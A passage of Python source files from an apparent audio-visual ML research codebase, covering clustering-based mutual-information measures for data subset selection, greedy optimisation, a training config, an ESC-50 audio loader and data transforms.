b = last['b'] # W x P x C
n = last['n'].unsqueeze(-1) # W x P x 1
ha = self.calc_entropy(a, n)
hb = self.calc_entropy(b, n)
return ha, hb
def calc_AMI(self, last):
mi = self.calc_MI(last)
emi = self.calc_EMI(last)
ha, hb = self.calc_entropies(last)
normalizer = self.generalized_mean(ha, hb)
denominator = normalizer - emi
'''
if denominator < 0:
denominator = min(denominator, -np.finfo('float64').eps)
else:
denominator = max(denominator, np.finfo('float64').eps)
'''
denominator = self.ensure_nonzero(denominator)
ami = (mi - emi) / denominator
return ami
class EfficientNMI(EfficientAMI):
def _calc_score(self, *args, **kwargs):
return self.calc_NMI(*args, **kwargs)
def calc_NMI(self, last):
mi = self.calc_MI(last)
ha, hb = self.calc_entropies(last)
normalizer = self.generalized_mean(ha, hb)
normalizer = self.ensure_nonzero(normalizer)
return (2 * mi) / normalizer
class ConstantMeasure(EfficientMI):
def _calc_score(self, *args, **kwargs):
return self.calc_constant(*args, **kwargs)
def calc_constant(self, last):
n = last['n'] # W x P
return torch.full_like(n, 1)
```
#### File: code/measures/mutual_information.py
```python
from typing import List
from itertools import combinations
from collections import defaultdict
import numpy as np
import sklearn.metrics as metrics
from clustering import Clustering
MEASURES = {
"adjusted_rand": metrics.adjusted_rand_score,
"fowlkes_mallows": metrics.fowlkes_mallows_score,
"mutual_info": metrics.mutual_info_score,
"adjusted_mutual_info": metrics.adjusted_mutual_info_score, # equal to Normalized Variation of Information
"normalized_mutual_info": metrics.normalized_mutual_info_score,
}
class MutualInformation(object):
""" mean of pairwise mutual information """
def __init__(self, clusterings: List[Clustering], measure_type='mutual_info'):
self.nclusterings = len(clusterings)
self.clusterings = clusterings
self.measure_type = measure_type
self.measure = MEASURES[self.measure_type]
# self.measure_dict = defaultdict(lambda: 0)
'''
def init_count_dict(self):
clustering_indices = range(self.nclusterings) # do not use clustering_indices
clustering_combinations = combinations(clustering_indices, 2)
count_dict = {}
for tuple_indices in clustering_combinations:
idx = sorted(tuple_indices)
m = np.full((self.get_clustering(idx[0]).ncentroids,
self.get_clustering(idx[1]).ncentroids), self.eps)
dict_key = self.get_dict_key(tuple_indices)
count_dict[dict_key] = m
return count_dict
'''
def get_clustering(self, ind):
return self.clusterings[ind]
def get_assignment(self, indices, cluster_ind):
clustering = self.clusterings[cluster_ind]
return [clustering.get_assignment(ind) for ind in indices]
'''
def get_dict_key(self, tuple_indices):
key = tuple(tuple_indices)
key = str(sorted(key))
return key
def update_count(self, count_dict, tuple_indices, indices):
tuple_indices = sorted(tuple_indices)
dict_key = self.get_dict_key(tuple_indices)
for idx in indices:
c1 = self.get_clustering(tuple_indices[0])
c2 = self.get_clustering(tuple_indices[1])
a1 = c1.get_assignment(idx)
a2 = c2.get_assignment(idx)
count_dict[dict_key][a1, a2] += 1
return count_dict
'''
def get_combination(self):
clustering_indices = range(self.nclusterings)
group_size = 2
clustering_combinations = combinations(clustering_indices, group_size)
return clustering_combinations
def get_measure(self, indices, clustering_combinations=None, agreed_dict={}):
if clustering_combinations is None:
clustering_combinations = self.get_combination()
new_agreed_dict = {}
measures = []
for pair_indices in clustering_combinations:
indices1 = self.get_assignment(indices, pair_indices[0])
indices2 = self.get_assignment(indices, pair_indices[1])
measures.append(self.measure(indices1, indices2))
measure = sum(measures) / len(measures)
return measure, new_agreed_dict
'''
def calc_measure(self, count_dict, cluster_pair):
cluster_pair = sorted(cluster_pair)
dict_key = str(cluster_pair)
n = count_dict[dict_key]
N = n.sum()
a = n.sum(axis=0, keepdims=True)
b = n.sum(axis=1, keepdims=True)
measure = self.calc_func(n, a, b, N)
return measure
@staticmethod
def calc_MI(n, a, b, N):
return (n / N * (np.log(n * N) - np.log(a * b))).sum()
'''
def __call__(self, *args, **kwargs):
return self.get_measure(*args, **kwargs)
```
#### File: code/optimization/efficient.py
```python
import time
import random
from tqdm import tqdm
import numpy as np
def efficient_greedy(
measure,
dataset_size,
subset_size,
start_indices,
intermediate_target=None,
clustering_combinations=None,
celf_ratio=0,
verbose=True
):
candidates = list(set(range(dataset_size)) - set(start_indices))
random.shuffle(candidates)
if verbose:
print("initializing")
measure.init(clustering_combinations, candidates)
if verbose:
print("done initialization")
return measure.run(subset_size, start_indices, intermediate_target, celf_ratio)
```
#### File: code/optimization/greedy.py
```python
import time
import random
from tqdm import tqdm
import numpy as np
def greedy(
measure,
dataset_size,
subset_size,
start_indices,
intermediate_target=None,
clustering_combinations=None,
verbose=True
):
candidates = list(set(range(dataset_size)) - set(start_indices))
random.shuffle(candidates)
greedy_start_time = time.time()
start_time = time.time()
Q = [[c, None] for c in candidates]
S = start_indices
GAIN = []
LOOKUPS = []
timelapse = []
agreed_dict = {}
pbar = tqdm(range(len(start_indices), subset_size - 1), desc='greedy iter')
for j in pbar:
best_idx = -1
best_measure = -np.inf
for i in range(len(Q)):
current = Q[i][0]
current_measure, current_agreed_dict = measure(
S + [current], clustering_combinations=clustering_combinations,
agreed_dict=agreed_dict,
)
if current_measure > best_measure:
best_measure = current_measure
best_idx = i
best_agreed_dict = current_agreed_dict
agreed_dict = best_agreed_dict
S.append(Q[best_idx][0])
lookup = len(Q)
LOOKUPS.append(lookup)
GAIN.append(best_measure)
timelapse.append(time.time() - start_time)
del Q[best_idx]
'''
import copy
c = copy.deepcopy(agreed_dict['count']['[0, 1]'])
if c_prev is not None:
print(c - c_prev)
c_prev = c
'''
if intermediate_target is not None:
precision = len(set(intermediate_target) & set(S)) / len(set(S))
pbar.set_description("(LEN: {}, MEASURE: {}, PRECISION: {})".format(
len(S), best_measure, precision))
else:
pbar.set_description("(LEN: {}, MEASURE: {})".format(len(S), best_measure))
if verbose:
tqdm.write("Time Consumed: {} seconds".format(time.time() - greedy_start_time))
return (S, GAIN, timelapse, LOOKUPS)
```
#### File: correspondence_retrieval/code/utils.py
```python
import os, contextlib
import pickle
from functools import reduce
from collections import defaultdict
def merge_dicts(li_of_dt):
if len(li_of_dt) == 0:
return {}
res = {}
for key in li_of_dt[0].keys():
res[key] = flatten_dt([v[key] for v in li_of_dt])
return res
def exchange_levels(dt):
# keys = peek(dt).keys()
res = defaultdict(dict)
for k1, lv1 in dt.items():
for k2, lv2 in lv1.items():
res[k2][k1] = lv2
return dict(res)
def flatten_dt(dt):
if isinstance(dt, dict):
return reduce(lambda x, y: {**x, **y}, dt.values())
else:
return reduce(lambda x, y: {**x, **y}, dt)
def peek(dt):
keys = list(dt.keys())
return dt[keys[0]]
def load_pickle(x):
with open(x, 'rb') as f:
x = pickle.load(f)
return x
def dump_pickle(data, path):
with open(str(path), 'wb') as f:
pickle.dump(data, f)
def supress_stdout(func):
def wrapper(*a, **ka):
with open(os.devnull, 'w') as devnull:
with contextlib.redirect_stdout(devnull):
func(*a, **ka)
return wrapper
def merge_dataset_model_name(dataset, model):
return "{}-{}".format(dataset, model)
def split_dataset_model_name(key):
names = key.split('-')
return names[0], '-'.join(names[1:])
def split_dataset_model_names(keys):
keys = [split_dataset_model_name(key) for key in keys]
res = defaultdict(list)
for dataset, model in keys:
res[dataset].append(model)
return dict(res)
```
#### File: evaluation/code/config.py
```python
import os
import argparse
from datetime import datetime
import torch
from pathlib import Path
"""Configs."""
from fvcore.common.config import CfgNode
import warnings
project_dir = str(Path(__file__).resolve().parent.parent)
dataset_root = os.path.join(project_dir, 'datasets')
output_root = os.path.join(project_dir, 'runs')
# -----------------------------------------------------------------------------
# Config definition
# -----------------------------------------------------------------------------
_C = CfgNode()
# ---------------------------------------------------------------------------- #
# Batch norm options
# ---------------------------------------------------------------------------- #
_C.BN = CfgNode()
# Weight decay value that applies on BN.
_C.BN.WEIGHT_DECAY = 0.0
# ---------------------------------------------------------------------------- #
# Pretraining options.
# ---------------------------------------------------------------------------- #
_C.PRETRAIN = CfgNode()
# Path to the checkpoint to load the pretrained weight.
_C.PRETRAIN.CHECKPOINT_FILE_PATH = ""
# Dataset.
_C.PRETRAIN.DATASET = "ACAV"
# Dataset size
_C.PRETRAIN.DATASET_SIZE = 100000000
# Total mini-batch size.
_C.PRETRAIN.BATCH_SIZE = 64
# Save model checkpoint every save period iterations
_C.PRETRAIN.SAVE_PERIOD = 500
# Save model checkpoint every `save_every_epoch` epochs
_C.PRETRAIN.SAVE_EVERY_EPOCH = 1
# PREEMPTIBLE
_C.PRETRAIN.PREEMPTIBLE = True
# ---------------------------------------------------------------------------- #
# Audio-Visual Contrastive Task options.
# ---------------------------------------------------------------------------- #
_C.CONTRAST = CfgNode()
# Projection size.
_C.CONTRAST.PROJECTION_SIZE = 128
# Softmax temperature
_C.CONTRAST.TEMPERATURE = 0.1
# Whether to use globl batch
_C.CONTRAST.USE_GLOBAL_BATCH = True
# ---------------------------------------------------------------------------- #
# Training options.
# ---------------------------------------------------------------------------- #
_C.TRAIN = CfgNode()
# If True Train the model, else skip training.
_C.TRAIN.ENABLE = True
# Dataset.
_C.TRAIN.DATASET = "UCF101"
# Dataset split.
_C.TRAIN.DATASET_SPLIT = 1
# Number of samples to sample from a data file.
_C.TRAIN.NUM_SAMPLES = 10
# Total mini-batch size.
_C.TRAIN.BATCH_SIZE = 64
# Evaluate model on validation data every eval period epochs.
_C.TRAIN.EVAL_PERIOD = 1
# Evaluate model on test data every test period epochs.
_C.TRAIN.TEST_PERIOD = 1
# Save model checkpoint every `save_every_epoch` epochs.
_C.TRAIN.SAVE_EVERY_EPOCH = 1
# Path to the checkpoint to load the initial weight.
_C.TRAIN.CHECKPOINT_FILE_PATH = ""
# PREEMPTIBLE
_C.TRAIN.PREEMPTIBLE = False
# ---------------------------------------------------------------------------- #
# Validation options
# ---------------------------------------------------------------------------- #
_C.VAL = CfgNode()
# If True validate the model, else skip the testing.
_C.VAL.ENABLE = False
# Dataset for validation.
_C.VAL.DATASET = "UCF101"
# Dataset split.
_C.VAL.DATASET_SPLIT = 1
# ---------------------------------------------------------------------------- #
# Testing options
# ---------------------------------------------------------------------------- #
_C.TEST = CfgNode()
# If True test the model, else skip the testing.
_C.TEST.ENABLE = False
# Dataset for testing.
_C.TEST.DATASET = "UCF101"
# Dataset split.
_C.TEST.DATASET_SPLIT = 1
# Total mini-batch size
_C.TEST.BATCH_SIZE = 64
# Path to the checkpoint to load the initial weight.
_C.TEST.CHECKPOINT_FILE_PATH = ""
# Number of samples to sample from a data file.
_C.TEST.NUM_SAMPLES = 30
# Number of samples to sample from a video uniformly for aggregating the
# prediction results.
_C.TEST.NUM_ENSEMBLE_VIEWS = 10
# Number of crops to sample from a frame spatially for aggregating the
# prediction results.
_C.TEST.NUM_SPATIAL_CROPS = 3
# -----------------------------------------------------------------------------
# Visual options
# -----------------------------------------------------------------------------
_C.VIS = CfgNode()
# Visual Model architecture.
_C.VIS.ARCH = "resnet"
# Visual Model name.
_C.VIS.MODEL_NAME = "ResNet"
# -----------------------------------------------------------------------------
# ResNet options
# -----------------------------------------------------------------------------
_C.RESNET = CfgNode()
# Transformation function.
_C.RESNET.TRANS_FUNC = "bottleneck_transform"
# Number of groups. 1 for ResNet, and larger than 1 for ResNeXt).
_C.RESNET.NUM_GROUPS = 1
# Width of each group (64 -> ResNet; 4 -> ResNeXt).
_C.RESNET.WIDTH_PER_GROUP = 64
# Apply relu in a inplace manner.
_C.RESNET.INPLACE_RELU = True
# Apply stride to 1x1 conv.
_C.RESNET.STRIDE_1X1 = False
# Number of weight layers.
_C.RESNET.DEPTH = 50
# If the current block has more than NUM_BLOCK_TEMP_KERNEL blocks, use temporal
# kernel of 1 for the rest of the blocks.
_C.RESNET.NUM_BLOCK_TEMP_KERNEL = [[3], [4], [6], [3]]
# Size of stride on different res stages.
_C.RESNET.SPATIAL_STRIDES = [[1], [2], [2], [2]]
# Size of dilation on different res stages.
_C.RESNET.SPATIAL_DILATIONS = [[1], [1], [1], [1]]
# -----------------------------------------------------------------------------
# Audio options
# -----------------------------------------------------------------------------
_C.AUD = CfgNode()
# Audio Model architecture.
_C.AUD.ARCH = "resnet"
# Audio Model name
_C.AUD.MODEL_NAME = "AudioResNet"
# -----------------------------------------------------------------------------
# AudioResNet options
# -----------------------------------------------------------------------------
_C.AUDIO_RESNET = CfgNode()
# Transformation function.
_C.AUDIO_RESNET.TRANS_FUNC = "bottleneck_transform"
# Number of groups. 1 for ResNet, and larger than 1 for ResNeXt).
_C.AUDIO_RESNET.NUM_GROUPS = 1
# Width of each group (32 -> ResNet; 4 -> ResNeXt).
_C.AUDIO_RESNET.WIDTH_PER_GROUP = 32
# Apply relu in a inplace manner.
_C.AUDIO_RESNET.INPLACE_RELU = True
# Apply stride to 1x1 conv.
_C.AUDIO_RESNET.STRIDE_1X1 = False
# Number of weight layers.
_C.AUDIO_RESNET.DEPTH = 50
# Size of stride on different res stages.
_C.AUDIO_RESNET.STRIDES = [2, 2, 2, 2]
# Size of dilation on different res stages.
_C.AUDIO_RESNET.DILATIONS = [1, 1, 1, 1]
# -----------------------------------------------------------------------------
# Model options
# -----------------------------------------------------------------------------
_C.MODEL = CfgNode()
# Downstream task.
_C.MODEL.TASK = "VisualClassify"
# The std to initialize the fc layer(s).
_C.MODEL.FC_INIT_STD = 0.01
# If true, initialize the gamma of the final BN of each block of ResNet to zero.
_C.MODEL.ZERO_INIT_FINAL_BN = True
# Epsilon value for normalization layers.
_C.MODEL.EPSILON = 1e-5
# Momentum value for normalization layers.
_C.MODEL.MOMENTUM = 0.1
# The number of classes to predict for the model.
_C.MODEL.NUM_CLASSES = 101
# Dropout rate.
_C.MODEL.DROPOUT_RATE = 0.5
# -----------------------------------------------------------------------------
# Data options
# -----------------------------------------------------------------------------
_C.DATA = CfgNode()
# The spatial crop size of the input clip.
_C.DATA.CROP_SIZE = 224
# The number of frames of the input clip.
_C.DATA.NUM_FRAMES = 32
# The video sampling rate of the input clip.
_C.DATA.SAMPLING_RATE = 2
# Input videos may have different fps, convert it to the target video fps before
# frame sampling.
_C.DATA.TARGET_FPS = 30
# List of input frame channel dimensions.
_C.DATA.INPUT_CHANNEL_NUM = [3]
# The mean value of the video raw pixels across the R G B channels.
_C.DATA.MEAN = [0.45, 0.45, 0.45]
# The std value of the video raw pixels across the R G B channels.
_C.DATA.STD = [0.225, 0.225, 0.225]
# The spatial crop size for pretraining.
_C.DATA.PRETRAIN_CROP_SIZE = 224
# The spatial augmentation jitter scales for pretraining.
_C.DATA.PRETRAIN_JITTER_SCALES = [256, 320]
# The spatial crop size for training.
_C.DATA.TRAIN_CROP_SIZE = 224
# The spatial augmentation jitter scales for training.
_C.DATA.TRAIN_JITTER_SCALES = [256, 320]
# The spatial crop size for testing.
_C.DATA.TEST_CROP_SIZE = 256
# Input audio clip duration (sec)
_C.DATA.CLIP_DURATION = 2
# Input audios may have different sampling rate, convert it to the target audio
# sampling rate.
_C.DATA.TARGET_AUDIO_RATE = 44100
# Number of mel bins for log-mel-scaled spectrograms.
_C.DATA.AUDIO_FREQUENCY = 80
# Time dimension for log-mel-scaled spectrograms.
_C.DATA.AUDIO_TIME = 128
# The audio frequency masking droput rate.
_C.DATA.FREQUENCY_MASK_RATE = 0.05
# The audio temporal masking dropout rate.
_C.DATA.TIME_MASK_RATE = 0.05
# Method to perform the ensemble, options include "sum" and "max".
_C.DATA.ENSEMBLE_METHOD = "sum"
# List of data augmentations.
_C.DATA.TRANSFORMATIONS = ["resize_crop", "flip", "color_normalize"]
# ---------------------------------------------------------------------------- #
# Optimizer options
# ---------------------------------------------------------------------------- #
_C.SOLVER = CfgNode()
# Base learning rate.
_C.SOLVER.BASE_LR = 1e-3
# Learning rate policy (see utils/lr_policy.py for options and examples).
_C.SOLVER.LR_POLICY = "linear"
# Maximal number of epochs.
_C.SOLVER.MAX_EPOCH = 10
# Maximal number of steps.
_C.SOLVER.NUM_STEPS = -1
# Momentum.
_C.SOLVER.MOMENTUM = 0.9
# Momentum dampening.
_C.SOLVER.DAMPENING = 0.0
# Nesterov momentum.
_C.SOLVER.NESTEROV = True
# Use AMSGrad
_C.SOLVER.USE_AMSGRAD = True
# L2 regularization.
_C.SOLVER.WEIGHT_DECAY = 1e-5
# The start learning rate of the warm up.
_C.SOLVER.WARMUP_START_LR = 0.0
# Gradually warm up the lr over this number of steps.
_C.SOLVER.WARMUP_STEPS = -1
# Gradually warm up the lr over this number of epochs.
_C.SOLVER.WARMUP_EPOCHS = -1
# Gradually warm up the lr over the first proportion of total steps.
_C.SOLVER.WARMUP_PROPORTION = 0.0
# Optimization method.
_C.SOLVER.OPTIMIZING_METHOD = "adamw"
# ---------------------------------------------------------------------------- #
# Misc options
# ---------------------------------------------------------------------------- #
# Number of GPUs to use per machine (applies to both training and testing).
_C.NUM_GPUS = -1
# Number of machine to use for the job.
_C.NUM_SHARDS = 1
# The index of the current machine.
_C.SHARD_ID = 0
# Data basedir.
_C.DATASET_ROOT = ""
# Data dir.
_C.DATASET_DIR = ""
# Output basedir.
_C.OUTPUT_ROOT = ""
# Checkpoints dir.
_C.SAVE_DIR = ""
# Log dir.
_C.LOG_DIR = ""
# Note that non-determinism may still be present due to non-deterministic
# operator implementations in GPU operator libraries.
_C.RNG_SEED = -1
# Log period in iters.
_C.LOG_PERIOD = 50
# Distributed init method.
_C.DIST_INIT_METHOD = "tcp://localhost:9999"
# Distributed backend.
_C.DIST_BACKEND = "nccl"
# ---------------------------------------------------------------------------- #
# Common train/test data loader options
# ---------------------------------------------------------------------------- #
_C.DATA_LOADER = CfgNode()
# Number of data loader workers per training process.
_C.DATA_LOADER.NUM_WORKERS = 16
# Load data to pinned host memory.
_C.DATA_LOADER.PIN_MEMORY = True
def _assert_and_infer_cfg(cfg):
# TEST assertions.
assert cfg.TEST.NUM_SPATIAL_CROPS == 3
# RESNET assertions.
assert cfg.RESNET.NUM_GROUPS > 0
assert cfg.RESNET.WIDTH_PER_GROUP > 0
assert cfg.RESNET.WIDTH_PER_GROUP % cfg.RESNET.NUM_GROUPS == 0
assert cfg.AUDIO_RESNET.NUM_GROUPS > 0
assert cfg.AUDIO_RESNET.WIDTH_PER_GROUP > 0
assert cfg.AUDIO_RESNET.WIDTH_PER_GROUP % cfg.AUDIO_RESNET.NUM_GROUPS == 0
# TASK
assert cfg.MODEL.TASK in ["Contrast", "VisualClassify", "AudioClassify", "MultimodalClassify"]
if cfg.MODEL.TASK in ["Contrast"]:
assert cfg.DATASET_DIR != ""
if cfg.MODEL.TASK in ["VisualClassify", "AudioClassify", "MultimodalClassify"]:
assert len(
{
cfg.TRAIN.DATASET,
cfg.VAL.DATASET,
cfg.TEST.DATASET,
}
) == 1
return cfg
def get_cfg():
"""
Get a copy of the default config.
"""
config = _C.clone()
parser = argparse.ArgumentParser()
parser.add_argument("--test", action="store_true")
parser.add_argument("--dist_init_method", type=str, default=None)
parser.add_argument("--dataset_root", type=str, default=None)
parser.add_argument("--output_root", type=str, default=None)
parser.add_argument("--configuration", type=str, default=None)
parser.add_argument("--cfg_file", type=str, default=None)
parser.add_argument("--pretrain_checkpoint_path", type=str, default=None)
parser.add_argument("--train_checkpoint_path", type=str, default=None)
parser.add_argument("--test_checkpoint_path", type=str, default=None)
parser.add_argument(
"opts",
default=None,
nargs=argparse.REMAINDER
)
args = parser.parse_args()
if args.cfg_file is not None:
config.merge_from_file(args.cfg_file)
if args.opts is not None:
config.merge_from_list(args.opts)
if args.dist_init_method is not None:
config.DIST_INIT_METHOD = args.dist_init_method
if args.dataset_root is not None:
config.DATASET_ROOT = args.dataset_root
elif not config.DATASET_ROOT:
config.DATASET_ROOT = dataset_root
if config.MODEL.TASK in ["VisualClassify", "AudioClassify", "MultimodalClassify"]:
if config.TRAIN.DATASET == "UCF101":
config.DATASET_DIR = os.path.join(
config.DATASET_ROOT,
'ucf101',
)
elif config.TRAIN.DATASET == "ESC50":
config.DATASET_DIR = os.path.join(
config.DATASET_ROOT,
'esc50',
)
elif config.TRAIN.DATASET == "KineticsSounds":
config.DATASET_DIR = os.path.join(
config.DATASET_ROOT,
'kinetics-sounds',
)
if args.output_root is not None:
config.OUTPUT_ROOT = args.output_root
elif not config.OUTPUT_ROOT:
config.OUTPUT_ROOT = output_root
if args.configuration is not None:
configuration = args.configuration
else:
configuration = datetime.now().strftime('%Y-%m-%d_%H:%M:%S')
config.SAVE_DIR = os.path.join(
config.OUTPUT_ROOT,
configuration,
"checkpoints"
)
if not args.test:
Path(config.SAVE_DIR).mkdir(parents=True, exist_ok=True)
config.LOG_DIR = os.path.join(
config.OUTPUT_ROOT,
configuration,
"logs"
)
if not args.test:
Path(config.LOG_DIR).mkdir(parents=True, exist_ok=True)
if config.NUM_GPUS == -1:
config.NUM_GPUS = torch.cuda.device_count()
if args.pretrain_checkpoint_path is not None:
config.PRETRAIN.CHECKPOINT_FILE_PATH = args.pretrain_checkpoint_path
if args.train_checkpoint_path is not None:
config.TRAIN.CHECKPOINT_FILE_PATH = args.train_checkpoint_path
if args.test_checkpoint_path is not None:
config.TEST.CHECKPOINT_FILE_PATH = args.test_checkpoint_path
return _assert_and_infer_cfg(config)
```
#### File: code/data/esc50.py
```python
import os
import torch
import torchaudio
from pathlib import Path
import utils.logging as logging
import data.transform as transform
import data.utils as utils
from data.build import DATASET_REGISTRY
logger = logging.get_logger(__name__)
@DATASET_REGISTRY.register()
class ESC50(torch.utils.data.Dataset):
"""
ESC-50 audio loader. Construct the ESC-50 audio loader, then sample
clips from the audios. For training and validation, multiple clips are
uniformly sampled from every audio with random masking. For testing,
multiple clips are uniformaly sampled from every audio without any masking.
We convert the input audio to a monophonic signal and convert it to
log-mel-scaled spectrogram.
"""
def __init__(self, cfg, mode):
"""
Construct the ESC-50 audio loader.
Args:
cfg (CfgNode): configs.
mode (string): Options includes `train`, `val`, or `test` mode.
"""
assert mode in [
"train",
"val",
"test",
], "Mode '{}' not supported for ESC50".format(mode)
if mode == "val":
logger.info(
"ESC50 does not have the val split... "
"Instead we will use the test split"
)
self.mode = mode
self.cfg = cfg
if self.mode in ['train', 'val']:
self._num_clips = cfg.TRAIN.NUM_SAMPLES
elif self.mode in ['test']:
self._num_clips = (
cfg.TEST.NUM_SAMPLES
)
self.split = cfg[mode.upper()]["DATASET_SPLIT"]
logger.info(f"Constructin ESC50 mode {self.mode} split {self.split}")
self._construct_loader()
def _construct_loader(self):
"""
Construct the audio loader.
"""
dir_to_files = Path(
os.path.join(
self.cfg.DATASET_DIR,
"audio",
)
)
split_files = sorted(
dir_to_files.glob("*.wav")
)
if self.mode in ["train"]:
split_files = [
path for path in split_files
if int(path.name.split('.')[0].split('-')[0]) != self.split
]
elif self.mode in ["val", "test"]:
split_files = [
path for path in split_files
if int(path.name.split('.')[0].split('-')[0]) == self.split
]
self._path_to_audios = []
self._labels = []
self._temporal_idx = []
for clip_idx, path in enumerate(split_files):
label = int(path.name.split('.')[0].split('-')[-1])
for idx in range(self._num_clips):
self._path_to_audios.append(str(path))
self._labels.append(label)
self._temporal_idx.append(idx)
assert (
len(self._path_to_audios) > 0
), "Failed to load ESC50 mode {} split {}".format(
self.mode, self.split,
)
logger.info(
"Constructing ESC50 dataloader (mode: {}, split: {}, size: {})".format(
self.mode, self.split, len(self._path_to_audios),
)
)
def __len__(self):
"""
Returns:
(int): the number of audios in the dataset.
"""
return len(self._path_to_audios)
def __getitem__(self, index):
"""
Given the audio index, return the log-mel-scaled spectrogram, label,
and audio index.
args:
index (int): the audio index provided by the pytorch sampler.
returns:
audio_clip (tensor): log-mel-spectrogram sampled from the audio.
The dimension is `channel` x `frequency` x `time`.
label (int): the label of the current audio.
index (int): the index of the audio.
"""
waveform, audio_fps = torchaudio.load(self._path_to_audios[index])
# Convert it to a monophonic signal, and resample to the
# target sampling rate if needed.
waveform = transform.resample(
waveform,
audio_fps,
self.cfg.DATA.TARGET_AUDIO_RATE,
use_mono=True,
)
total_length = waveform.size(1)
# We sample a `DATA.CLIP_DURATION`-sec clip.
clip_length = (
self.cfg.DATA.TARGET_AUDIO_RATE * self.cfg.DATA.CLIP_DURATION
)
delta = max(total_length - clip_length, 0)
start_idx = int(
delta * self._temporal_idx[index] / (self._num_clips - 1)
)
audio_clip = self.get_audio(
waveform,
start_idx,
clip_length,
True if self.mode in ['train'] else False,
)
label = self._labels[index]
return audio_clip, label, index
def get_audio(
self,
waveform,
start_idx,
clip_length,
apply_transform=False,
):
"""
Sample a clip from the input audio, and apply audio transformations.
Args:
waveform (tensor): a tensor of audio waveform, dimension is
`channel` x `time`.
start_idx (int): the start index.
clip_length (int): the size of audio clip.
apply_transform (bool): whether to apply transformations.
Returns:
(tensor): log-mel-scaled spectrogram with dimension of
`channel` x `frequency` x `time`.
"""
# Temporal sampling.
waveform_view = waveform[:, start_idx:start_idx + clip_length]
# Convert it to log-mel-scaled spectrogram.
log_mel_spectrogram = transform.get_log_mel_spectrogram(
waveform_view,
self.cfg.DATA.TARGET_AUDIO_RATE,
self.cfg.DATA.AUDIO_FREQUENCY,
self.cfg.DATA.AUDIO_TIME,
)
# Apply transformations.
if apply_transform:
log_mel_spectrogram = utils.apply_audio_transform(
log_mel_spectrogram,
self.cfg.DATA.FREQUENCY_MASK_RATE,
self.cfg.DATA.TIME_MASK_RATE,
)
return log_mel_spectrogram
```
#### File: code/data/transform.py
```python
import math
import numpy as np
import torch
import torchaudio
def random_short_side_scale_jitter(
images, min_size, max_size,
):
"""
Perform a spatial short scale jittering on the given images.
Args:
images (tensor): images to perform scale jitter. Dimension is
`num frames` x `channel` x `height` x `width`.
min_size (int): the minimal size to scale the frames.
max_size (int): the maximal size to scale the frames.
Returns:
(tensor): the scaled images with dimension of
`num frames` x `channel` x `new height` x `new width`.
"""
size = int(round(np.random.uniform(min_size, max_size)))
height = images.shape[2]
width = images.shape[3]
if (width <= height and width == size) or (
height <= width and height == size
):
return images
new_width = size
new_height = size
if width < height:
new_height = int(math.floor((float(height) / width) * size))
else:
new_width = int(math.floor((float(width) / height) * size))
return torch.nn.functional.interpolate(
images,
size=(new_height, new_width),
mode="nearest",
# align_corners=False,
)
def random_crop(images, size):
"""
Perform random spatial crop on the given images.
Args:
images (tensor): images to perform random crop. The dimension is
`num frames` x `channel` x `height` x `width`.
size (int): the size of height and width to crop on the image.
Returns:
cropped (tensor): cropped images with dimension of
`num frames` x `channel` x `size` x `size`.
"""
if images.shape[2] == size and images.shape[3] == size:
return images
height = images.shape[2]
width = images.shape[3]
y_offset = 0
if height > size:
y_offset = int(np.random.randint(0, height - size))
x_offset = 0
if width > size:
x_offset = int(np.random.randint(0, width - size))
cropped = images[
:, :, y_offset : y_offset + size, x_offset : x_offset + size
]
return cropped
def horizontal_flip(prob, images):
"""
Perform horizontal flip on the given images.
Args:
prob (float): probility to flip the images.
images (tensor): images to perform horizontal flip, the dimension is
`num frames` x `channel` x `height` x `width`.
Returns:
images (tensor): images with dimension of
`num frames` x `channel` x `height` x `width`.
"""
if np.random.uniform() < prob:
images = images.flip((-1))
return images
def uniform_crop(images, size, spatial_idx):
"""
Perform uniform spatial sampling on the images.
args:
images (tensor): images to perform uniform crop. The dimension is
`num frames` x `channel` x `height` x `width`.
size (int): size of height and weight to crop the images.
spatial_idx (int): 0, 1, or 2 for left, center, and right crop if width
is larger than height. or 0, 1, or 2 for top, center, and bottom
crop if height is larger than width.
returns:
cropped (tensor): images with dimension of
`num frames` x `channel` x `size` x `size`.
"""
assert spatial_idx in [0, 1, 2]
height = images.shape[2]
width = images.shape[3]
y_offset = int(math.ceil((height - size) / 2))
x_offset = int(math.ceil((width - size) / 2))
if height > width:
if spatial_idx == 0:
y_offset = 0
elif spatial_idx == 2:
y_offset = height - size
else:
if spatial_idx == 0:
x_offset = 0
elif spatial_idx == 2:
x_offset = width - size
cropped = images[
:, :, y_offset : y_offset + size, x_offset : x_offset + size
]
return cropped
def color_normalization(images, mean, stddev):
"""
Perform color nomration on the given images.
Args:
images (tensor): images to perform color normalization. Dimension is
`num frames` x `channel` x `height` x `width`.
mean (list): mean values for normalization.
stddev (list): standard deviations for normalization.
Returns:
out_images (tensor): the noramlized images, the dimension is
`num frames` x `channel` x `height` x `width`.
"""
assert len(mean) == images.shape[1], "channel mean not computed properly"
assert (
len(stddev) == images.shape[1]
), "channel stddev not computed properly"
out_images = torch.zeros_like(images)
for idx in range(len(mean)):
out_images[:, idx] = (images[:, idx] - mean[idx]) / stddev[idx]
return out_images
def mask_along_axis_consistent(
specgrams,
mask_param,
mask_value,
axis,
):
"""
Apply a consistent mask along ``axis`` on a batch of specgrams.
Mask will be applied from indices ``[v_0, v_0 + v)``, where
``v`` is sampled from ``uniform(0, mask_param)``, and ``v_0`` from ``uniform(0, max_v - v)``.
Args:
specgrams (Tensor): Real spectrograms (batch, channel, freq, time)
mask_param (int): Number of columns to be masked will be uniformly sampled from [0, mask_param]
mask_value (float): Value to assign to the masked columns
axis (int): Axis to apply masking on (2 -> frequency, 3 -> time)
Returns:
Tensor: Masked spectrograms of dimensions (batch, channel, freq, time)
"""
if axis != 2 and axis != 3:
raise ValueError('Only Frequency and Time masking are supported')
device = specgrams.device
dtype = specgrams.dtype
value = torch.rand(specgrams.shape[1], device=device, dtype=dtype) * mask_param
min_value = torch.rand(specgrams.shape[1], device=device, dtype=dtype) * (specgrams.size(axis) - value)
value, min_value = value.unsqueeze(0), min_value.unsqueeze(0)
# Create broadcastable mask
mask_start = min_value[..., None, None]
mask_end = (min_value + value)[..., None, None]
mask = torch.arange(0, specgrams.size(axis), device=device, dtype=dtype)
# Per batch example masking
specgrams = specgrams.transpose(axis, -1)
specgrams.masked_fill_((mask >= mask_start) & (mask < mask_end), mask_value)
specgrams = specgrams.transpose(axis, -1)
return specgrams
def resample(waveform, orig_freq, new_freq, use_mono=True):
"""
Resample the input waveform to ``new_freq``.
args:
waveform (tensor): waveform to perform resampling. The dimension is
`channel` x `frequency` x `width`.
